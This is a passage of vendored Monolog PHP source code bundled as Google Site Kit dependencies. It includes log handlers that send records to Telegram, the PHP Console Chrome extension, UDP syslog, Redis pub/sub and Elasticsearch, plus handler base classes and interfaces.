?bool $disableWebPagePreview = null, ?bool $disableNotification = null, bool $splitLongMessages = \false, bool $delayBetweenMessages = \false) { if (!\extension_loaded('curl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The curl extension is needed to use the TelegramBotHandler'); } parent::__construct($level, $bubble); $this->apiKey = $apiKey; $this->channel = $channel; $this->setParseMode($parseMode); $this->disableWebPagePreview($disableWebPagePreview); $this->disableNotification($disableNotification); $this->splitLongMessages($splitLongMessages); $this->delayBetweenMessages($delayBetweenMessages); } public function setParseMode(?string $parseMode = null) : self { if ($parseMode !== null && !\in_array($parseMode, self::AVAILABLE_PARSE_MODES)) { throw new \InvalidArgumentException('Unknown parseMode, use one of these: ' . \implode(', ', self::AVAILABLE_PARSE_MODES) . '.'); } $this->parseMode = $parseMode; return $this; } public function disableWebPagePreview(?bool $disableWebPagePreview = null) : self { $this->disableWebPagePreview = $disableWebPagePreview; return $this; } public function disableNotification(?bool $disableNotification = null) : self { $this->disableNotification = $disableNotification; return $this; } /** * True - split a message longer than MAX_MESSAGE_LENGTH into parts and send in multiple messages. * False - truncates a message that is too long. * @param bool $splitLongMessages * @return $this */ public function splitLongMessages(bool $splitLongMessages = \false) : self { $this->splitLongMessages = $splitLongMessages; return $this; } /** * Adds 1-second delay between sending a split message (according to Telegram API to avoid 429 Too Many Requests). * @param bool $delayBetweenMessages * @return $this */ public function delayBetweenMessages(bool $delayBetweenMessages = \false) : self { $this->delayBetweenMessages = $delayBetweenMessages; return $this; } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { /** @var Record[] $messages */ $messages = []; foreach ($records as $record) { if (!$this->isHandling($record)) { continue; } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $messages[] = $record; } if (!empty($messages)) { $this->send((string) $this->getFormatter()->formatBatch($messages)); } } /** * @inheritDoc */ protected function write(array $record) : void { $this->send($record['formatted']); } /** * Send request to @link https://api.telegram.org/bot on SendMessage action. * @param string $message */ protected function send(string $message) : void { $messages = $this->handleMessageLength($message); foreach ($messages as $key => $msg) { if ($this->delayBetweenMessages && $key > 0) { \sleep(1); } $this->sendCurl($msg); } } protected function sendCurl(string $message) : void { $ch = \curl_init(); $url = self::BOT_API . $this->apiKey . '/SendMessage'; \curl_setopt($ch, \CURLOPT_URL, $url); \curl_setopt($ch, \CURLOPT_RETURNTRANSFER, \true); \curl_setopt($ch, \CURLOPT_SSL_VERIFYPEER, \true); \curl_setopt($ch, \CURLOPT_POSTFIELDS, \http_build_query(['text' => $message, 'chat_id' => $this->channel, 'parse_mode' => $this->parseMode, 'disable_web_page_preview' => $this->disableWebPagePreview, 'disable_notification' => $this->disableNotification])); $result = \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($ch); if (!\is_string($result)) { throw new \RuntimeException('Telegram API error. Description: No response'); } $result = \json_decode($result, \true); if ($result['ok'] === \false) { throw new \RuntimeException('Telegram API error. Description: ' . $result['description']); } } /** * Handle a message that is too long: truncates or splits into several * @param string $message * @return string[] */ private function handleMessageLength(string $message) : array { $truncatedMarker = ' (...truncated)'; if (!$this->splitLongMessages && \strlen($message) > self::MAX_MESSAGE_LENGTH) { return [\Google\Site_Kit_Dependencies\Monolog\Utils::substr($message, 0, self::MAX_MESSAGE_LENGTH - \strlen($truncatedMarker)) . $truncatedMarker]; } return \str_split($message, self::MAX_MESSAGE_LENGTH); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\PhpConsole\Connector; use Google\Site_Kit_Dependencies\PhpConsole\Handler as VendorPhpConsoleHandler; use Google\Site_Kit_Dependencies\PhpConsole\Helper; /** * Monolog handler for Google Chrome extension "PHP Console" * * Display PHP error/debug log messages in Google Chrome console and notification popups, executes PHP code remotely * * Usage: * 1. Install Google Chrome extension [now dead and removed from the chrome store] * 2. See overview https://github.com/barbushin/php-console#overview * 3. Install PHP Console library https://github.com/barbushin/php-console#installation * 4. Example (result will looks like http://i.hizliresim.com/vg3Pz4.png) * * $logger = new \Monolog\Logger('all', array(new \Monolog\Handler\PHPConsoleHandler())); * \Monolog\ErrorHandler::register($logger); * echo $undefinedVar; * $logger->debug('SELECT * FROM users', array('db', 'time' => 0.012)); * PC::debug($_SERVER); // PHP Console debugger for any type of vars * * @author Sergey Barbushin https://www.linkedin.com/in/barbushin * * @phpstan-import-type Record from \Monolog\Logger * @deprecated Since 2.8.0 and 3.2.0, PHPConsole is abandoned and thus we will drop this handler in Monolog 4 */ class PHPConsoleHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var array<string, mixed> */ private $options = [ 'enabled' => \true, // bool Is PHP Console server enabled 'classesPartialsTraceIgnore' => ['Monolog\\'], // array Hide calls of classes started with... 'debugTagsKeysInContext' => [0, 'tag'], // bool Is PHP Console server enabled 'useOwnErrorsHandler' => \false, // bool Enable errors handling 'useOwnExceptionsHandler' => \false, // bool Enable exceptions handling 'sourcesBasePath' => null, // string Base path of all project sources to strip in errors source paths 'registerHelper' => \true, // bool Register PhpConsole\Helper that allows short debug calls like PC::debug($var, 'ta.g.s') 'serverEncoding' => null, // string|null Server internal encoding 'headersLimit' => null, // int|null Set headers size limit for your web-server 'password' => null, // string|null Protect PHP Console connection by password 'enableSslOnlyMode' => \false, // bool Force connection by SSL for clients with PHP Console installed 'ipMasks' => [], // array Set IP masks of clients that will be allowed to connect to PHP Console: array('192.168.*.*', '127.0.0.1') 'enableEvalListener' => \false, // bool Enable eval request to be handled by eval dispatcher(if enabled, 'password' option is also required) 'dumperDetectCallbacks' => \false, // bool Convert callback items in dumper vars to (callback SomeClass::someMethod) strings 'dumperLevelLimit' => 5, // int Maximum dumped vars array or object nested dump level 'dumperItemsCountLimit' => 100, // int Maximum dumped var same level array items or object properties number 'dumperItemSizeLimit' => 5000, // int Maximum length of any string or dumped array item 'dumperDumpSizeLimit' => 500000, // int Maximum approximate size of dumped vars result formatted in JSON 'detectDumpTraceAndSource' => \false, // bool Autodetect and append trace data to debug 'dataStorage' => null, ]; /** @var Connector */ private $connector; /** * @param array<string, mixed> $options See \Monolog\Handler\PHPConsoleHandler::$options for more details * @param Connector|null $connector Instance of \PhpConsole\Connector class (optional) * @throws \RuntimeException */ public function __construct(array $options = [], ?\Google\Site_Kit_Dependencies\PhpConsole\Connector $connector = null, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if (!\class_exists('Google\\Site_Kit_Dependencies\\PhpConsole\\Connector')) { throw new \RuntimeException('PHP Console library not found. See https://github.com/barbushin/php-console#installation'); } parent::__construct($level, $bubble); $this->options = $this->initOptions($options); $this->connector = $this->initConnector($connector); } /** * @param array<string, mixed> $options * * @return array<string, mixed> */ private function initOptions(array $options) : array { $wrongOptions = \array_diff(\array_keys($options), \array_keys($this->options)); if ($wrongOptions) { throw new \RuntimeException('Unknown options: ' . \implode(', ', $wrongOptions)); } return \array_replace($this->options, $options); } private function initConnector(?\Google\Site_Kit_Dependencies\PhpConsole\Connector $connector = null) : \Google\Site_Kit_Dependencies\PhpConsole\Connector { if (!$connector) { if ($this->options['dataStorage']) { \Google\Site_Kit_Dependencies\PhpConsole\Connector::setPostponeStorage($this->options['dataStorage']); } $connector = \Google\Site_Kit_Dependencies\PhpConsole\Connector::getInstance(); } if ($this->options['registerHelper'] && !\Google\Site_Kit_Dependencies\PhpConsole\Helper::isRegistered()) { \Google\Site_Kit_Dependencies\PhpConsole\Helper::register(); } if ($this->options['enabled'] && $connector->isActiveClient()) { if ($this->options['useOwnErrorsHandler'] || $this->options['useOwnExceptionsHandler']) { $handler = \Google\Site_Kit_Dependencies\PhpConsole\Handler::getInstance(); $handler->setHandleErrors($this->options['useOwnErrorsHandler']); $handler->setHandleExceptions($this->options['useOwnExceptionsHandler']); $handler->start(); } if ($this->options['sourcesBasePath']) { $connector->setSourcesBasePath($this->options['sourcesBasePath']); } if ($this->options['serverEncoding']) { $connector->setServerEncoding($this->options['serverEncoding']); } if ($this->options['password']) { $connector->setPassword($this->options['password']); } if ($this->options['enableSslOnlyMode']) { $connector->enableSslOnlyMode(); } if ($this->options['ipMasks']) { $connector->setAllowedIpMasks($this->options['ipMasks']); } if ($this->options['headersLimit']) { $connector->setHeadersLimit($this->options['headersLimit']); } if ($this->options['detectDumpTraceAndSource']) { $connector->getDebugDispatcher()->detectTraceAndSource = \true; } $dumper = $connector->getDumper(); $dumper->levelLimit = $this->options['dumperLevelLimit']; $dumper->itemsCountLimit = $this->options['dumperItemsCountLimit']; $dumper->itemSizeLimit = $this->options['dumperItemSizeLimit']; $dumper->dumpSizeLimit = $this->options['dumperDumpSizeLimit']; $dumper->detectCallbacks = $this->options['dumperDetectCallbacks']; if ($this->options['enableEvalListener']) { $connector->startEvalRequestsListener(); } } return $connector; } public function getConnector() : \Google\Site_Kit_Dependencies\PhpConsole\Connector { return $this->connector; } /** * @return array<string, mixed> */ public function getOptions() : array { return $this->options; } public function handle(array $record) : bool { if ($this->options['enabled'] && $this->connector->isActiveClient()) { return parent::handle($record); } return !$this->bubble; } /** * Writes the record down to the log of the implementing handler */ protected function write(array $record) : void { if ($record['level'] < \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE) { $this->handleDebugRecord($record); } elseif (isset($record['context']['exception']) && $record['context']['exception'] instanceof \Throwable) { $this->handleExceptionRecord($record); } else { $this->handleErrorRecord($record); } } /** * @phpstan-param Record $record */ private function handleDebugRecord(array $record) : void { $tags = $this->getRecordTags($record); $message = $record['message']; if ($record['context']) { $message .= ' ' . \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($this->connector->getDumper()->dump(\array_filter($record['context'])), null, \true); } $this->connector->getDebugDispatcher()->dispatchDebug($message, $tags, $this->options['classesPartialsTraceIgnore']); } /** * @phpstan-param Record $record */ private function handleExceptionRecord(array $record) : void { $this->connector->getErrorsDispatcher()->dispatchException($record['context']['exception']); } /** * @phpstan-param Record $record */ private function handleErrorRecord(array $record) : void { $context = $record['context']; $this->connector->getErrorsDispatcher()->dispatchError($context['code'] ?? null, $context['message'] ?? $record['message'], $context['file'] ?? null, $context['line'] ?? null, $this->options['classesPartialsTraceIgnore']); } /** * @phpstan-param Record $record * @return string */ private function getRecordTags(array &$record) { $tags = null; if (!empty($record['context'])) { $context =& $record['context']; foreach ($this->options['debugTagsKeysInContext'] as $key) { if (!empty($context[$key])) { $tags = $context[$key]; if ($key === 0) { \array_shift($context); } else { unset($context[$key]); } break; } } } return $tags ?: \strtolower($record['level_name']); } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter('%message%'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler\SyslogUdp; use Google\Site_Kit_Dependencies\Monolog\Utils; use Socket; class UdpSocket { protected const DATAGRAM_MAX_LENGTH = 65023; /** @var string */ protected $ip; /** @var int */ protected $port; /** @var resource|Socket|null */ protected $socket = null; public function __construct(string $ip, int $port = 514) { $this->ip = $ip; $this->port = $port; } /** * @param string $line * @param string $header * @return void */ public function write($line, $header = "") { $this->send($this->assembleMessage($line, $header)); } public function close() : void { if (\is_resource($this->socket) || $this->socket instanceof \Socket) { \socket_close($this->socket); $this->socket = null; } } /** * @return resource|Socket */ protected function getSocket() { if (null !== $this->socket) { return $this->socket; } $domain = \AF_INET; $protocol = \SOL_UDP; // Check if we are using unix sockets. if ($this->port === 0) { $domain = \AF_UNIX; $protocol = \IPPROTO_IP; } $this->socket = \socket_create($domain, \SOCK_DGRAM, $protocol) ?: null; if (null === $this->socket) { throw new \RuntimeException('The UdpSocket to ' . $this->ip . ':' . $this->port . ' could not be opened via socket_create'); } return $this->socket; } protected function send(string $chunk) : void { \socket_sendto($this->getSocket(), $chunk, \strlen($chunk), $flags = 0, $this->ip, $this->port); } protected function assembleMessage(string $line, string $header) : string { $chunkSize = static::DATAGRAM_MAX_LENGTH - \strlen($header); return $header . \Google\Site_Kit_Dependencies\Monolog\Utils::substr($line, 0, $chunkSize); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed; /** * Interface for activation strategies for the FingersCrossedHandler. * * @author Johannes M. Schmitt <schmittjoh@gmail.com> * * @phpstan-import-type Record from \Monolog\Logger */ interface ActivationStrategyInterface { /** * Returns whether the given record activates the handler. * * @phpstan-param Record $record */ public function isHandlerActivated(array $record) : bool; } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Channel and Error level based monolog activation strategy. Allows to trigger activation * based on level per channel. e.g. trigger activation on level 'ERROR' by default, except * for records of the 'sql' channel; those should trigger activation on level 'WARN'. * * Example: * * <code> * $activationStrategy = new ChannelLevelActivationStrategy( * Logger::CRITICAL, * array( * 'request' => Logger::ALERT, * 'sensitive' => Logger::ERROR, * ) * ); * $handler = new FingersCrossedHandler(new StreamHandler('php://stderr'), $activationStrategy); * </code> * * @author Mike Meessen <netmikey@gmail.com> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class ChannelLevelActivationStrategy implements \Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ActivationStrategyInterface { /** * @var Level */ private $defaultActionLevel; /** * @var array<string, Level> */ private $channelToActionLevel; /** * @param int|string $defaultActionLevel The default action level to be used if the record's category doesn't match any * @param array<string, int> $channelToActionLevel An array that maps channel names to action levels. * * @phpstan-param array<string, Level> $channelToActionLevel * @phpstan-param Level|LevelName|LogLevel::* $defaultActionLevel */ public function __construct($defaultActionLevel, array $channelToActionLevel = []) { $this->defaultActionLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($defaultActionLevel); $this->channelToActionLevel = \array_map('Monolog\\Logger::toMonologLevel', $channelToActionLevel); } /** * @phpstan-param Record $record */ public function isHandlerActivated(array $record) : bool { if (isset($this->channelToActionLevel[$record['channel']])) { return $record['level'] >= $this->channelToActionLevel[$record['channel']]; } return $record['level'] >= $this->defaultActionLevel; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Error level based activation strategy. * * @author Johannes M. Schmitt <schmittjoh@gmail.com> * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class ErrorLevelActivationStrategy implements \Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ActivationStrategyInterface { /** * @var Level */ private $actionLevel; /** * @param int|string $actionLevel Level or name or value * * @phpstan-param Level|LevelName|LogLevel::* $actionLevel */ public function __construct($actionLevel) { $this->actionLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($actionLevel); } public function isHandlerActivated(array $record) : bool { return $record['level'] >= $this->actionLevel; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; /** * Base Handler class providing basic close() support as well as handleBatch * * @author Jordi Boggiano <j.boggiano@seld.be> */ abstract class Handler implements \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { /** * {@inheritDoc} */ public function handleBatch(array $records) : void { foreach ($records as $record) { $this->handle($record); } } /** * {@inheritDoc} */ public function close() : void { } public function __destruct() { try { $this->close(); } catch (\Throwable $e) { // do nothing } } public function __sleep() { $this->close(); $reflClass = new \ReflectionClass($this); $keys = []; foreach ($reflClass->getProperties() as $reflProp) { if (!$reflProp->isStatic()) { $keys[] = $reflProp->getName(); } } return $keys; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Sends the message to a Redis Pub/Sub channel using PUBLISH * * usage example: * * $log = new Logger('application'); * $redis = new RedisPubSubHandler(new Predis\Client("tcp://localhost:6379"), "logs", Logger::WARNING); * $log->pushHandler($redis); * * @author Gaëtan Faugère <gaetan@fauge.re> */ class RedisPubSubHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var \Predis\Client<\Predis\Client>|\Redis */ private $redisClient; /** @var string */ private $channelKey; /** * @param \Predis\Client<\Predis\Client>|\Redis $redis The redis instance * @param string $key The channel key to publish records to */ public function __construct($redis, string $key, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if (!($redis instanceof \Google\Site_Kit_Dependencies\Predis\Client || $redis instanceof \Redis)) { throw new \InvalidArgumentException('Predis\\Client or Redis instance required'); } $this->redisClient = $redis; $this->channelKey = $key; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->redisClient->publish($this->channelKey, $record["formatted"]); } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; /** * Forwards records to multiple handlers * * @author Lenar Lõhmus <lenar@city.ee> * * @phpstan-import-type Record from \Monolog\Logger */ class GroupHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\Handler implements \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\ResettableInterface { use ProcessableHandlerTrait; /** @var HandlerInterface[] */ protected $handlers; /** @var bool */ protected $bubble; /** * @param HandlerInterface[] $handlers Array of Handlers. * @param bool $bubble Whether the messages that are handled can bubble up the stack or not */ public function __construct(array $handlers, bool $bubble = \true) { foreach ($handlers as $handler) { if (!$handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { throw new \InvalidArgumentException('The first argument of the GroupHandler must be an array of HandlerInterface instances.'); } } $this->handlers = $handlers; $this->bubble = $bubble; } /** * {@inheritDoc} */ public function isHandling(array $record) : bool { foreach ($this->handlers as $handler) { if ($handler->isHandling($record)) { return \true; } } return \false; } /** * {@inheritDoc} */ public function handle(array $record) : bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } foreach ($this->handlers as $handler) { $handler->handle($record); } return \false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { if ($this->processors) { $processed = []; foreach ($records as $record) { $processed[] = $this->processRecord($record); } /** @var Record[] $records */ $records = $processed; } foreach ($this->handlers as $handler) { $handler->handleBatch($records); } } public function reset() { $this->resetProcessors(); foreach ($this->handlers as $handler) { if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $handler->reset(); } } } public function close() : void { parent::close(); foreach ($this->handlers as $handler) { $handler->close(); } } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { foreach ($this->handlers as $handler) { if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $handler->setFormatter($formatter); } } return $this; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Base Handler class providing basic level/bubble support * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ abstract class AbstractHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\Handler implements \Google\Site_Kit_Dependencies\Monolog\ResettableInterface { /** * @var int * @phpstan-var Level */ protected $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG; /** @var bool */ protected $bubble = \true; /** * @param int|string $level The minimum logging level at which this handler will be triggered * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { $this->setLevel($level); $this->bubble = $bubble; } /** * {@inheritDoc} */ public function isHandling(array $record) : bool { return $record['level'] >= $this->level; } /** * Sets minimum logging level at which this handler will be triggered. * * @param Level|LevelName|LogLevel::* $level Level or level name * @return self */ public function setLevel($level) : self { $this->level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); return $this; } /** * Gets minimum logging level at which this handler will be triggered. * * @return int * * @phpstan-return Level */ public function getLevel() : int { return $this->level; } /** * Sets the bubbling behavior. * * @param bool $bubble true means that this handler allows bubbling. * false means that bubbling is not permitted. * @return self */ public function setBubble(bool $bubble) : self { $this->bubble = $bubble; return $this; } /** * Gets the bubbling behavior. * * @return bool true means that this handler allows bubbling. * false means that bubbling is not permitted. */ public function getBubble() : bool { return $this->bubble; } /** * {@inheritDoc} */ public function reset() { } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\HtmlFormatter; /** * Base class for all mail handlers * * @author Gyula Sallai * * @phpstan-import-type Record from \Monolog\Logger */ abstract class MailHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * {@inheritDoc} */ public function handleBatch(array $records) : void { $messages = []; foreach ($records as $record) { if ($record['level'] < $this->level) { continue; } /** @var Record $message */ $message = $this->processRecord($record); $messages[] = $message; } if (!empty($messages)) { $this->send((string) $this->getFormatter()->formatBatch($messages), $messages); } } /** * Send a mail with the given content * * @param string $content formatted email body to be sent * @param array $records the array of log records that formed this content * * @phpstan-param Record[] $records */ protected abstract function send(string $content, array $records) : void; /** * {@inheritDoc} */ protected function write(array $record) : void { $this->send((string) $record['formatted'], [$record]); } /** * @phpstan-param non-empty-array<Record> $records * @phpstan-return Record */ protected function getHighestRecord(array $records) : array { $highestRecord = null; foreach ($records as $record) { if ($highestRecord === null || $highestRecord['level'] < $record['level']) { $highestRecord = $record; } } return $highestRecord; } protected function isHtmlBody(string $body) : bool { return ($body[0] ?? null) === '<'; } /** * Gets the default formatter. * * @return FormatterInterface */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\HtmlFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; /** * Interface that all Monolog Handlers must implement * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ interface HandlerInterface { /** * Checks whether the given record will be handled by this handler. * * This is mostly done for performance reasons, to avoid calling processors for nothing. * * Handlers should still check the record levels within handle(), returning false in isHandling() * is no guarantee that handle() will not be called, and isHandling() might not be called * for a given record. * * @param array $record Partial log record containing only a level key * * @return bool * * @phpstan-param array{level: Level} $record */ public function isHandling(array $record) : bool; /** * Handles a record. * * All records may be passed to this method, and the handler should discard * those that it does not want to handle. * * The return value of this function controls the bubbling process of the handler stack. * Unless the bubbling is interrupted (by returning true), the Logger class will keep on * calling further handlers in the stack with a given log record. * * @param array $record The record to handle * @return bool true means that this handler handled the record, and that bubbling is not permitted. * false means the record was either not processed or that this handler allows bubbling. * * @phpstan-param Record $record */ public function handle(array $record) : bool; /** * Handles a set of records at once. * * @param array $records The records to handle (an array of record arrays) * * @phpstan-param Record[] $records */ public function handleBatch(array $records) : void; /** * Closes the handler. * * Ends a log cycle and frees all resources used by the handler. * * Closing a Handler means flushing all buffers and freeing any open resources/handles. * * Implementations have to be idempotent (i.e. it should be possible to call close several times without breakage) * and ideally handlers should be able to reopen themselves on handle() after they have been closed. * * This is useful at the end of a request and will be called automatically when the object * is destroyed if you extend Monolog\Handler\Handler. * * If you are thinking of calling this method yourself, most likely you should be * calling ResettableInterface::reset instead. Have a look. */ public function close() : void; } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; /** * Forwards records to multiple handlers suppressing failures of each handler * and continuing through to give every handler a chance to succeed. * * @author Craig D'Amelio <craig@damelio.ca> * * @phpstan-import-type Record from \Monolog\Logger */ class WhatFailureGroupHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\GroupHandler { /** * {@inheritDoc} */ public function handle(array $record) : bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } foreach ($this->handlers as $handler) { try { $handler->handle($record); } catch (\Throwable $e) { // What failure? } } return \false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { if ($this->processors) { $processed = array(); foreach ($records as $record) { $processed[] = $this->processRecord($record); } /** @var Record[] $records */ $records = $processed; } foreach ($this->handlers as $handler) { try { $handler->handleBatch($records); } catch (\Throwable $e) { // What failure? } } } /** * {@inheritDoc} */ public function close() : void { foreach ($this->handlers as $handler) { try { $handler->close(); } catch (\Throwable $e) { // What failure? } } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Elastica\Document; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\ElasticaFormatter; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Elastica\Client; use Google\Site_Kit_Dependencies\Elastica\Exception\ExceptionInterface; /** * Elastic Search handler * * Usage example: * * $client = new \Elastica\Client(); * $options = array( * 'index' => 'elastic_index_name', * 'type' => 'elastic_doc_type', Types have been removed in Elastica 7 * ); * $handler = new ElasticaHandler($client, $options); * $log = new Logger('application'); * $log->pushHandler($handler); * * @author Jelle Vink <jelle.vink@gmail.com> */ class ElasticaHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * @var Client */ protected $client; /** * @var mixed[] Handler config options */ protected $options = []; /** * @param Client $client Elastica Client object * @param mixed[] $options Handler configuration */ public function __construct(\Google\Site_Kit_Dependencies\Elastica\Client $client, array $options = [], $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { parent::__construct($level, $bubble); $this->client = $client; $this->options = \array_merge([ 'index' => 'monolog', // Elastic index name 'type' => 'record', // Elastic document type 'ignore_error' => \false, ], $options); } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->bulkSend([$record['formatted']]); } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if ($formatter instanceof \Google\Site_Kit_Dependencies\Monolog\Formatter\ElasticaFormatter) { return parent::setFormatter($formatter); } throw new \InvalidArgumentException('ElasticaHandler is only compatible with ElasticaFormatter'); } /** * @return mixed[] */ public function getOptions() : array { return $this->options; } /** * {@inheritDoc} */ protected function getDefaultFormatter() : 